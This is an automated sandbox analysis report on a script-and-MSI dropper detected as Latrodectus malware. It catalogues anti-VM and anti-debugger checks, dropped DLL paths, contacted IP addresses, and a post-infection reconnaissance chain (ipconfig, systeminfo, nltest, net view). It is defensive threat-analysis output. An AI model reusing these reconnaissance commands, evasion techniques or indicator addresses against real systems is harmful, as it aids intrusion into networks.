Source: C:\Windows\System32\rundll32.exe

6_2_0000000180062148

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\rundll32.exe

6_2_00000001800655A8

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

6_2_0000000180049AEC

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	6_2_00000187EC8568E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	6_2_00000187EC857FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	7_2_00000201DAAE7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	7_2_00000201DAAE68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	8_2_000001A3795068E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	8_2_000001A379507FA8

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 807			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8931			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Windows\Installer\MSI3B6A.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\Installer\MSI3B6A.tmp	API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 8.4 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC

6_2_0000000180049AEC

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 380	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 6540	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep count: 261 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep time: -261000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812	Thread sleep count: 807 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 5812	Thread sleep time: -80700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep count: 8931 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4724	Thread sleep time: -8931000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries the current domain controller via net

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AF79 FindFirstFileExW,	4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000001A379501A08

Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: wscript.exe, 00000000.00000003.2049218463.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040729475.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048754066.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046212474.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049827134.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048245243.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA956000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3337300936.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006FD0A5 IsDebuggerPresent,OutputDebugStringW,

4_2_006FD0A5

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

6_2_0000000180066C3C

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

6_2_00000001800033E0

Contains functionality to read the PEB

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AD78 mov eax, dword ptr fs:[00000030h]		4_2_0072AD78
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00722DCC mov ecx, dword ptr fs:[00000030h]		4_2_00722DCC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F2310 GetProcessHeap,

4_2_006F2310

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007133A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_007133A8
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071353F SetUnhandledExceptionFilter,	4_2_0071353F
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00712968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00712968
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00716E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00716E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.59.82 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

JavaScript file contains Antivirus product strings

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Initial file: avast, eset, sophos

Contains functionality to launch a program with higher privileges

Source: C:\Windows\Installer\MSI3B6A.tmp

4_2_006F52F0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

6_2_000000018004A650

Source: C:\Windows\System32\rundll32.exe

6_2_0000000180049278

Source: Update_3b24da5a.dll.6.dr	Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_007135A9 cpuid

4_2_007135A9

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E0C6
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_00727132
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E111
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E1AC
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0072E237
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoEx,	4_2_007123F8
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_0072E48A
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0072E5B3
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_0072E6B9
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_007276AF
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0072E788
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_0072DE24

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_007137D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_007137D5

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000187EC858AE0 GetUserNameA,wsprintfA,

6_2_00000187EC858AE0

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_00727B1F GetTimeZoneInformation,

4_2_00727B1F

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,

6_2_0000000180040CB0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: rundll32.exe	Binary or memory string: 360tray.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

Stealing of Sensitive Information

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
